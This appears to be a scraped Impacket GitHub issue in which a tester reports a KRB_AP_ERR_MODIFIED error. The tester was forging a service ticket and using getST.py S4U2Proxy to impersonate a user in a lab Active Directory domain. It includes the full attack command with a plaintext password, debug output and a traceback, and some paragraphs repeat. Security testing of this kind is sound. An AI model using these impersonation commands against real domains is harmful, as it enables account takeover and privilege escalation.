My understanding is that this should work, but instead I'm getting Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified). Here are the commands I ran:
First, forging the ticket with the service account's nt hash:
Then using that service ticket to impersonate the victim (SteveSQL) and get an ST for kafka/dc.windomain.local:
./getST.py -spn 'kafka/dc.windomain.local' -impersonate 'WINDOMAIN/SteveSQL' -dc-ip 192.168.194.138 -additional-ticket ./SteveSQL.ccache -debug 'WINDOMAIN/Cousin:ILoveYou90'
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/Tools/impacket/.venv/lib/python3.11/site-packages/impacket
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[*] Getting TGT for user
[+] Trying to connect to KDC at 192.168.194.138:88
[+] Trying to connect to KDC at 192.168.194.138:88
[*] Impersonating WINDOMAIN/SteveSQL
[*] Using additional ticket ./SteveSQL.ccache instead of S4U2Self
[+] Returning cached credential for KAFKA/WEF.WINDOMAIN.LOCAL@WINDOMAIN.LOCAL
[+] Changing sname from kafka/wef.windomain.local@WINDOMAIN.LOCAL to b'kafka/wef.windomain.local@WINDOMAIN.LOCAL' and hoping for the best
[+] TGS_REP
TGS_REP:
pvno=5
msg-type=13
crealm=WINDOMAIN.LOCAL
cname=PrincipalName:
name-type=1
name-string=SequenceOf:
SteveSQL
ticket=Ticket:
tkt-vno=5
realm=WINDOMAIN.LOCAL
sname=PrincipalName:
name-type=1
name-string=SequenceOf:
kafka wef.windomain.local
enc-part=EncryptedData:
etype=23
kvno=2
cipher=0x9bed207b3db8ae4ce67c374083a5ddea40a297781711a8c845a4043c4aa4c1ec9655380b7703bbb048b3b6575b470898569ab71b3d0164bd996e6bb7baea4fb3a8d6b39e6f5e9f7a5998843eacddba5dcf159cc115245a6959d1ffc2f82772ec36043745238744f46aa2880976ade923e0d1d31d20fd09bd6f5cb394b64e7cb116a2b453d51941c731b8467ed0d65da7ae3665b8809cbbd776aec6dd44f2e3fe43b328b7dc446f9cbe6782e2e1ff48ca2f09342e43766e4cfd7213ff0e44fa9e711c5a2ee3550fd555a02bcdc2e952c3ac22f84704f89a094788574101d4f6ad7ad5c22e30b45085539b6720271a562f7f23668e0e2a67da77c8e79461eec89adf452c66193ace0a4b165e1a1c2684971355963ac3111d17abe0477a36344a8a2568475327c517fd483997882a81c701d6aab0c681ba4171042a59443ad7beef354a161b392a5c57ae4bb304a57dc9f9b0db1f5c4a200bb1f782759bc1871d6afe8498495207bbfe2259853f19832ab86eb068f1c4386dd4944e8ada40b3f177678a6610ce62bfb3223abc9d64bf19ebd495fb22f24e969ebf198711ea01fe860208afc34d5374258aef7b12c47bbeb51a638bd91a2f20e0f1f46f1faade317e0d7c507b4ec352ee3cb0c06debe7258a7b24d8c65701edc0f7e37d51e3aaf6184d53276f8334a7daddc43becfdc1196585682489fd9ba84e025d40a13101ec506a1c8b957adf42bc0a1211db33ca6b412929c6b10f2e292c579c5ff4f43b333865eaf97e5a97ddab21a3097cb7b6ccc319d15576547b5e63d50a2018b29143e4a043b38a4d747b82b03c6529ed70d2f7e363c440981745bc0310b09967b026b6b4a8c86826bfa4d12cbcfbce17c040ec1cf10322df0a06afae2497892267bd8141f02282692e617aad52bab695434d3d4fb4befbea8721d455f30168de3c2e9d011810ebaa8b10472eb8600c6ddb120d485f4b3cdc604940176b67688bd6836f6ee8fba214a55d66f12cd4c89450fec57c39936e97193495df70fa7a820bf2f85e1c0290108e47fcb44d556b032b1f5404e92cf02cb6c37e5ed8d0f4321641922a45eb47cc58a1abb3b123057ddf1fa03bfc8318b797dc80b9c0dbad44c41d05953257684e103b48fd96a62342649e8eaa4beb6ee67be265f7dfa7cc43bd57ca4b343317a943f457a3d068766c42f930d91298ae88e48c7098118701941cd8c6aaa836eccfebc250c2b0060ab95a29565ee8fca8b47a570f76b5c3dfbb15c0c8dc1d327852e99da64b09a000f34fc3122ab9259ebc4c2ba4f3db01f0f0ed5da3
enc-part=EncryptedData:
etype=1
cipher=
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 192.168.194.138:88
[+] Server time (UTC): 2024-03-15 05:08:44
[+] Exception
Traceback (most recent call last):
File "/home/kali/Tools/impacket/examples/./getST.py", line 652, in run
tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/impacket/examples/./getST.py", line 278, in doS4U2ProxyWithAdditionalTicket
r = sendReceive(message, self.__domain, kdcHost)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/impacket/.venv/lib/python3.11/site-packages/impacket/krb5/kerberosv5.py", line 91, in sendReceive
raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
For additional context, the impersonating GetST.py request works if the ccache is the result of a previous GetST.py call for the victim => kafka/wef.windomain.local (happy to provide debugging output for that if it would help), which leads me to think the issue is with the ccache produced by ticketer (or, more likely, my usage of it).
Configuration
impacket version: impacket_0_9_13-2498-g4b56c18a Python version: 3.11.4 Target OS: client - kali, DC - Windows Server 2016 Standard Eval Edition v1607
Debug Output With Command String
Howdy,
I'm trying to use impacket to test a particular constrained delegation scenario. Given the NTLM hash for a service account user "Cousin" with spn kafka/wef.windomain.local and msDS-AllowedToDelegateTo = [ kafka/dc.windomain.local ], I want to use ticketer to construct a forwardable ST for a victim user "SteveSQL" and then use getST.py w/ S4U2Proxy to exchange that ST for an ST for the victim => kafka/dc.windomain.local (basically scenario 2 from here: https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/#:~:text=domain%2Dcontroller%2Dfqdn-,Constrained%20Delegation,-References%20/%20Background).
My understanding is that this should work, but instead I'm getting Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified). Here are the commands I ran:
First, forging the ticket with the service account's nt hash:
Then using that service ticket to impersonate the victim (SteveSQL) and get an ST for kafka/dc.windomain.local:
For additional context, the impersonating GetST.py request works if the ccache is the result of a previous GetST.py call for the victim => kafka/wef.windomain.local (happy to provide debugging output for that if it would help), which leads me to think the issue is with the ccache produced by ticketer (or, more likely, my usage of it).
Thanks for your time (and for the great tool)!